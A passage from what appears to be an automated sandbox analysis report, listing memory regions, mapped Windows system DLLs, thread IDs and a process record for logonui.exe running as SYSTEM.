end_va = 0x186ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 4378 start_va = 0x7fefcc90000 end_va = 0x7fefcca1fff monitored = 0 entry_point = 0x7fefcc91060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 4379 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 4380 start_va = 0x7fef7fa0000 end_va = 0x7fef80cbfff monitored = 0 entry_point = 0x7fef8050ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 4381 start_va = 0x7fef7f30000 end_va = 0x7fef7f91fff monitored = 0 entry_point = 0x7fef7f6bd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 4389 start_va = 0x7fef82c0000 end_va = 0x7fef8392fff monitored = 0 entry_point = 0x7fef8338b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 4390 start_va = 0x7fef8240000 end_va = 0x7fef8266fff monitored = 0 entry_point = 0x7fef82411a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4391 start_va = 0x29b0000 end_va = 0x2baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 4400 start_va = 0x7fefb140000 end_va = 0x7fefb150fff monitored = 0 entry_point = 0x7fefb1416ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4401 start_va = 0x2860000 end_va = 0x28dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 4402 start_va = 0x29a0000 end_va = 0x29affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 4403 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 4404 start_va = 0x29b0000 end_va = 0x2aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 4405 start_va = 0x2b30000 end_va = 0x2baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 4406 start_va = 0x7fef7d90000 end_va = 0x7fef7dfafff monitored = 0 entry_point = 0x7fef7dd4344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 4412 start_va = 0x7fef94b0000 end_va = 0x7fef9523fff monitored = 0 entry_point = 0x7fef94b66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4413 start_va = 0x7fefb0c0000 end_va = 0x7fefb0d7fff monitored = 0 entry_point = 0x7fefb0c1bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4414 start_va = 0x7fef7c40000 end_va = 0x7fef7c52fff monitored = 0 entry_point = 0x7fef7c41d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 4420 start_va = 0x2c00000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 4421 start_va = 0x7fef8180000 end_va = 0x7fef818dfff monitored = 0 entry_point = 0x7fef8185500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 4422 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 4423 start_va = 0x7fef7c20000 end_va = 0x7fef7c39fff monitored = 0 entry_point = 0x7fef7c33fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 4427 start_va = 0x27e0000 end_va = 0x285ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 4428 start_va = 0x7fef7bf0000 end_va = 0x7fef7c10fff monitored = 0 entry_point = 0x7fef7c003b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 4429 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 4430 start_va = 0x2900000 end_va = 0x297ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4431 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 4432 start_va = 0x9b0000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 4433 start_va = 0x9b0000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 4507 start_va = 0x7fef7ae0000 end_va = 0x7fef7b39fff monitored = 0 entry_point = 0x7fef7b1dde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 4599 start_va = 0x7fefcfd0000 end_va = 0x7fefd02afff monitored = 0 entry_point = 0x7fefcfd6940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4600 start_va = 0x2c80000 end_va = 0x2d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 4601 start_va = 0x7fefab20000 end_va = 0x7fefab27fff monitored = 0 entry_point = 0x7fefab21414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4616 start_va = 0x9b0000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 4693 start_va = 0x7fef7350000 end_va = 0x7fef735bfff monitored = 0 entry_point = 0x7fef735602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4725 start_va = 0x2d90000 end_va = 0x2f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 4745 start_va = 0x3060000 end_va = 0x30dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 4746 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 4747 start_va = 0x30e0000 end_va = 0x34dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 4765 start_va = 0x1b90000 end_va = 0x1c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 4766 start_va = 0x2fe0000 end_va = 0x305ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 4767 start_va = 0x35b0000 end_va = 0x362ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 4768 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 4769 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 4770 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 4773 start_va = 0x2c90000 end_va = 0x2d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 4774 start_va = 0x2d10000 end_va = 0x2d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 4775 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 4779 start_va = 0x1f50000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 4780 start_va = 0x1ff0000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 4781 start_va = 0x2ab0000 end_va = 0x2b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 4782 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 4783 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 4823 start_va = 0x9b0000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 4829 start_va = 0x1390000 end_va = 0x140ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 4830 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 4839 start_va = 0xed0000 end_va = 0xee5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ed0000" filename = "" Region: id = 4858 start_va = 0x36e0000 end_va = 0x375ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 4859 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 4860 start_va = 0x36e0000 end_va = 0x375ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 4861 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 4880 start_va = 0x9b0000 end_va = 0x9bffff monitored = 0 entry_point = 0x9b3e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 4881 start_va = 0xaf0000 end_va = 0xaf3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 4921 start_va = 0x9b0000 end_va = 0x9bffff monitored = 0 entry_point = 0x9b3e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 4922 start_va = 0xaf0000 end_va = 0xaf3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 4942 start_va = 0x3760000 end_va = 0x3f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 5038 start_va = 0xed0000 end_va = 0xeebfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Thread: id = 301 os_tid = 0x314 Thread: id = 302 os_tid = 0x318 Thread: id = 303 os_tid = 0x31c Thread: id = 304 os_tid = 0x320 Thread: id = 305 os_tid = 0x324 Thread: id = 306 os_tid = 0x32c Thread: id = 338 os_tid = 0x3a4 Thread: id = 339 os_tid = 0x3a8 Thread: id = 340 os_tid = 0x3ac Thread: id = 345 os_tid = 0x3cc Thread: id = 352 os_tid = 0x3e8 Thread: id = 353 os_tid = 0x3ec Thread: id = 354 os_tid = 0x3f0 Thread: id = 360 os_tid = 0x118 Thread: id = 365 os_tid = 0x130 Thread: id = 388 os_tid = 0x134 Thread: id = 392 os_tid = 0x1fc Thread: id = 393 os_tid = 0x408 Thread: id = 394 os_tid = 0x40c Thread: id = 397 os_tid = 0x420 Thread: id = 398 os_tid = 0x410 Thread: id = 399 os_tid = 0x424 Thread: id = 402 os_tid = 0x444 Thread: id = 426 os_tid = 0x4ac Thread: id = 464 os_tid = 0x56c Thread: id = 467 os_tid = 0x578 Thread: id = 471 os_tid = 0x58c Thread: id = 481 os_tid = 0x5b0 Thread: id = 482 os_tid = 0x5b4 Thread: id = 483 os_tid = 0x5b8 Thread: id = 485 os_tid = 0x5c0 Thread: id = 486 os_tid = 0x5c4 Thread: id = 487 os_tid = 0x5cc Thread: id = 488 os_tid = 0x5d4 Thread: id = 491 os_tid = 0x5f0 Thread: id = 494 os_tid = 0x5fc Thread: id = 496 os_tid = 0x604 Thread: id = 497 os_tid = 0x608 Thread: id = 531 os_tid = 0x694 Thread: id = 532 os_tid = 0x698 Thread: id = 533 os_tid = 0x69c Thread: id = 534 os_tid = 0x6a0 Thread: id = 535 os_tid = 0x6a4 Thread: id = 537 os_tid = 0x6ac Thread: id = 538 os_tid = 0x6b0 Thread: id = 542 os_tid = 0x6c0 Thread: id = 551 os_tid = 0x6f0 Thread: id = 552 os_tid = 0x6f4 Process: id = "13" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x28f13000" os_pid = "0x2d0" os_integrity_level = "0x4000" os_privileges = "0x60b16000" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x184" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 2239 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2240 start_va = 0x170000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2241 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2243 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2244 start_va = 0xff610000 end_va = 0xff61afff monitored = 0 entry_point = 0xff615c78 region_type = mapped_file name = "logonui.exe" filename = "\\Windows\\System32\\LogonUI.exe" (normalized: "c:\\windows\\system32\\logonui.exe") Region: id = 2245 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2246 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2247 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2248 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2250 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2253 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2254 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2255 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2256 start_va = 0xc0000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2257 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2258 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 2259 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 2260 start_va = 0x120000 end_va = 0x121fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 2261 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2262 start_va = 0x220000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 2263 start_va = 0x320000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 2264 start_va = 0x420000 end_va = 0x5a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2265 start_va = 0x5b0000 end_va = 0x730fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2266 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2267 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2268 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2269 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2270 start_va = 0x7fefc8a0000 end_va = 0x7fefca79fff monitored = 0 entry_point = 0x7fefc8a3130 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 2271 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2272 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2273 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2274 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2275 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2276 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2277 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2278 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2279 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2280 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2281 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2282 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2283 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2284 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2291 start_va = 0x130000 end_va = 0x131fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 2292 start_va = 0x7fefc790000 end_va = 0x7fefc899fff monitored = 0 entry_point = 0x7fefc791010 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 2300 start_va = 0x150000 end_va = 0x151fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 2301 start_va = 0x7fefc3f0000 end_va = 0x7fefc5e3fff monitored = 0 entry_point = 0x7fefc57c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 2302 start_va = 0x7fefd960000 end_va = 0x7fefd96efff monitored = 0 entry_point = 0x7fefd961020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2303 start_va = 0x7fefdb20000 end_va = 0x7fefdc8cfff monitored = 0 entry_point = 0x7fefdb210b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2304 start_va = 0x7feff8d0000 end_va = 0x7feff940fff monitored = 0 entry_point = 0x7feff8e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2478 start_va = 0x140000 end_va = 0x141fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 2479 start_va = 0x7e0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 2480 start_va = 0x900000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 2481 start_va = 0x980000 end_va = 0xc4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2482 start_va = 0xd60000 end_va = 0xd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 2483 start_va = 0xe40000 end_va = 0xebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 2484 start_va = 0x7fefbd60000 end_va = 0x7fefbe51fff monitored = 0 entry_point = 0x7fefbd8ac20 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 2485 start_va = 0x7fefbe90000 end_va = 0x7fefc0a4fff monitored = 0 entry_point = 0x7fefc0664b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 2486 start_va = 0x7fefc0b0000 end_va = 0x7fefc105fff monitored = 0 entry_point = 0x7fefc0bbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2487 start_va = 0x7fefc110000 end_va = 0x7fefc23bfff monitored = 0 entry_point = 0x7fefc1194bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2488 start_va = 0x7fefc370000 end_va = 0x7fefc38cfff monitored = 0 entry_point = 0x7fefc371ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2489 start_va = 0x7fefc3c0000 end_va = 0x7fefc3e3fff monitored = 0 entry_point = 0x7fefc3c1024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 2490 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2491 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2494 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "authui.dll.mui" filename = "\\Windows\\System32\\en-US\\authui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\authui.dll.mui") Region: id = 2495 start_va = 0x200000 end_va = 0x201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 2496 start_va = 0x740000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 2497 start_va = 0xcc0000 end_va = 0xd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 2498 start_va = 0x7fefbcd0000 end_va = 0x7fefbd0afff monitored = 0 entry_point = 0x7fefbcdf410 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 2499 start_va = 0x7fefbd10000 end_va = 0x7fefbd52fff monitored = 0 entry_point = 0x7fefbd1c168 region_type = mapped_file name = "duser.dll" filename = 